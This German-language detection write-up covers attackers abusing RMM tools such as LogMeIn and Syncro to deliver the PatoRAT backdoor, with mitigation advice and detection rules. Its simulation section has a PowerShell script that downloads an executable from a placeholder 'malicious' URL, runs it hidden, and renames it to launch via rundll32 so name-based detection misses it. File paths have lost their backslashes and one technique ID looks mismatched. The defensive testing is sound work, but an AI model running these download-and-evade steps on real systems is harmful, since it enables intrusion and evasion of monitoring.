Endpunkt-Erkennung von Kürzlichen RMM-Verteilungsvorfällen
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Bedrohungsakteure missbrauchen zunehmend legitime Remote-Monitoring- und Management (RMM)-Tools – wie LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne und SuperOps -, um Malware zu verbreiten und dauerhaften Fernzugriff zu etablieren. Die anfängliche Auslieferung erfolgt oft über bösartige Download-Seiten oder Phishing-E-Mails, gefolgt von einer Ausführung über PowerShell und der Bereitstellung sekundärer Nutzlasten wie der PatoRAT-Backdoor. AhnLab EDR kann die Ausführung dieser RMM-Dienstprogramme erkennen und verhaltensbasierte Warnungen zu verdächtigen Folgeaktivitäten generieren. Der Bericht unterstreicht die Bedeutung der Validierung der Software-Herkunft und der kontinuierlichen Endpunktüberwachung.
Untersuchung
Das AhnLab Security Intelligence Center beobachtete mehrere Kampagnen, in denen Angreifer RMM-Installer als beliebte Anwendungen (zum Beispiel Notepad++, 7-Zip und Telegram) neu verpackten oder verschleierten und sie über bösartige Websites oder Phishing-Anhänge verbreiteten. Nach der Installation registrierten sich die RMM-Agents bei ihrer Herstellerinfrastruktur und wurden dann verwendet, um PowerShell-Nutzlasten auszuführen, die PatoRAT ablegten. Ähnliche Techniken erschienen bei mehreren RMM-Produkten, einschließlich Syncro, das über Phishing mit PDF-Ködern verbreitet wurde. AhnLab EDR-Erkennungslogik wurde entwickelt, um die Ausführung dieser an sich legitimen Binärdateien zu markieren und sie mit Verhaltensweisen nach der Installation zu korrelieren.
Minderung
Überprüfen Sie die Download-Quellen, validieren Sie die Code-Signatur-Zertifikate und vergleichen Sie die Hashes mit offiziellen Anbieter-Veröffentlichungen, bevor Sie RMM-Software in der Umgebung zulassen. Erzwingen Sie eine Anwendungsliste und erfordern Sie ausdrückliche Genehmigungen für die Ausführung von RMM. Überwachen Sie unerwartete RMM-Binärstartvorgänge, anomale PowerShell-Aktivitäten und verdächtige Verbindungen zu Anbieter-Infrastrukturdomainen, wenn solche Tools nicht genehmigt sind. Halten Sie Betriebssysteme und Sicherheitswerkzeuge auf dem neuesten Stand, um die Exposition zu reduzieren.
Reaktion
Wenn eine verdächtige RMM-Ausführung festgestellt wird, isolieren Sie den Host, sammeln Sie forensische Artefakte und entfernen Sie das unbefugte Binärprogramm. Blockieren Sie ausgehende Verbindungen zur Infrastruktur des Tools, um Fernsteuerungskanäle abzuschneiden, und führen Sie einen vollständigen Scan nach sekundären Nutzlasten wie PatoRAT durch. Aktualisieren Sie die Erkennungsinhalte mit beobachteten IOCs und informieren Sie das SOC über die Kampagnenmuster für schnellere Triagen.
Angriffsablauf
Erkennungen
Alternative Remote-Access- / Management-Software (via process_creation)
Anzeigen
Versuch einer möglichen SuperOps RMM-Softwareinstallation (via file_event)
Anzeigen
Alternative Remote-Access- / Management-Software (via audit)
Anzeigen
Alternative Remote-Access- / Management-Software (via system)
Anzeigen
Erkennung der Ausnutzung des RMM-Tools zur Malware-Verteilung [Windows Prozess-Erstellung]
Anzeigen
Simulation-Ausführung
Voraussetzung: Der Telemetrie- und Basis-Preflight-Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die präzise Umsetzung der vom Gegner verwendeten Technik (TTP), die zur Auslösung der Erkennungsregel bestimmt ist. Die Befehle und das Narrativ MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu generieren, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht zusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle:
Ein Angreifer liefert eine Phishing-E-Mail mit einem bösartigen Anhang. Der Anhang führt ein PowerShell-Skript aus, das das RMM-Binärprogramm herunterlädtLogMeIn.exetoC:Temp. Um die namensbasierte Erkennung zu umgehen, benennt der Angreifer das Binärprogramm umtool.exeund startet es überrundll32.exe(T1216). Das RMM-Binärprogramm kontaktiert dann den vom Angreifer kontrollierten C2-Server und legt eine Backdoor-Nutzlast ab. Nach der Ausführung löscht der Angreifer das Binärprogramm (T1542.004), um Spuren zu verwischen. -
Regressionstest-Skript:
# --------------------------------------------------------------- # Simulieren der Ausnutzung des RMM-Tools (Originalname) – sollte auslösen # --------------------------------------------------------------- $rmmPath = "C:TempLogMeIn.exe" Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath Write-Host "[*] Ausführen des originalen RMM-Binärprogramms (Alarmauslösung erwarten)..." Start-Process -FilePath $rmmPath -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Simulation der Umgehung durch Umbenennung und Proxy-Ausführung – sollte NICHT auslösen # --------------------------------------------------------------- $evasionPath = "C:Temptool.exe" Rename-Item -Path $rmmPath -NewName "tool.exe" Write-Host "[*] Umbenanntes RMM-Binärprogramm über rundll32 ausführen (Umgehung)..." $rundll = "$env:SystemRootSystem32rundll32.exe" Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Bereinigung von Artefakten # --------------------------------------------------------------- Write-Host "[*] Bereinigen von Binärdateien..." Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue Write-Host "[*] Simulation abgeschlossen." -
Bereinigungskommandos:
# Sicherstellen, dass übrig gebliebene Prozesse beendet werden Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force # Entfernen heruntergeladener Dateien (falls sie noch existieren) Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue